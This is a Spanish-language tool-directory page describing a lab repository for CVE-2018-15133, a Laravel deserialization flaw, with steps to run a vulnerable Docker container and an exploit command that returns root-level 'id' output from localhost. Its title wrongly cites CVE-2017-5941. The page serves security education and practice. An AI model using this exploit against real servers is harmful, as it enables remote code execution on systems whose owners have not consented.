Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Lab-for-cve-2018-15133 — Ejecución de exploit de deserialización con CVE-2017-5941 | Kitploit
Herramientas/GitHubGitHub/cr4zyd14m0nd137/lab-for-cve-2018-15133
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubcr4zyd14m0nd137/lab-for-cve-2018-15133

Lab-for-cve-2018-15133

Ejecución de exploit de deserialización con CVE-2017-5941

Ver Repositorio
12hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Resumen:

Explotación de la vulnerabilidad de deserialización CVE-2018-15133 Este exploit aprovecha una vulnerabilidad de deserialización en Laravel Framework hasta 5.5.40 y 5.6.x hasta 5.6.29.

Descripción

La ejecución remota de código podría ocurrir como resultado de una llamada a unserialize sobre un valor X-XSRF-TOKEN potencialmente no confiable. Esto involucra el método decrypt en Illuminate/Encryption/Encrypter.php y PendingBroadcast en gadgetchains/Laravel/RCE/3/chain.php de phpggc. El atacante debe conocer la clave de la aplicación, lo que normalmente nunca ocurriría, pero podría suceder si el atacante previamente tuvo acceso privilegiado o logró exitosamente un ataque anterior.

Requisitos previos

Para ejecutar este exploit, necesitas tener instalado lo siguiente en tu máquina:

  • Docker en el sistema operativo principal https://docs.docker.com/desktop/install/windows-install/
  • Esta máquina Docker https://hub.docker.com/r/kozmico/laravel-poc-cve-2018-15133
  • El exploit de este repositorio.
  • La máquina atacante, en este caso usaré una máquina Kali Linux corriendo en VMware con modo puente.

Pasos para reproducir:

  1. Descargar e instalar Docker.

  2. Abrir Docker como administrador.

  3. Abrir la terminal y descargar la máquina Docker.

docker pull kozmico/laravel-poc-cve-2018-15133

  1. Iniciar la máquina Docker:

docker run --name my-laravel-app -p 8000:80 -d kozmico/laravel-poc-cve-2018-15133

  1. Abrir Docker e iniciar el contenedor:

Esto iniciará la máquina Laravel. Intenta abrir en el navegador la máquina para asegurarte de que está funcionando. Puedes hacerlo con la IP y el puerto; para verificar la IP en Windows ejecuta: ipconfig En Linux ifconfig

  1. Si tienes problemas ejecutando Docker, probablemente necesitarás ejecutar estos comandos para usar Docker

wsl --set-default-version 2 wsl --update

  1. En este punto, todo debería estar configurado y lo único que queda es ejecutar el exploit.

Ejecutar el exploit

  1. Descarga el archivo del exploit en tu máquina.

  2. Abre una terminal y navega hasta la carpeta donde se encuentra el archivo del exploit.

  3. Ejecuta el siguiente comando para explotar el servidor:

./CVE-2018-15133 -URL http://localhost:8000 -API_KEY 9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk= -command "id" Esto debería darte la respuesta con el ID de la máquina que deseas atacar. También puedes usar comandos similares para solicitar carpetas y realizar otras tareas.

Respuesta: uid=0(root) gid=0(root) groups=0(root)

Conclusión

En conclusión, en esta vulnerabilidad pudimos observar la importancia de mantener actualizados los frameworks. Ya que estas herramientas pueden tener fallos de seguridad y son ampliamente utilizadas, estamos en riesgo si no nos mantenemos actualizados.

Referencia a:

https://github.com/0xSalle/cve-2018-15133

Descargar herramienta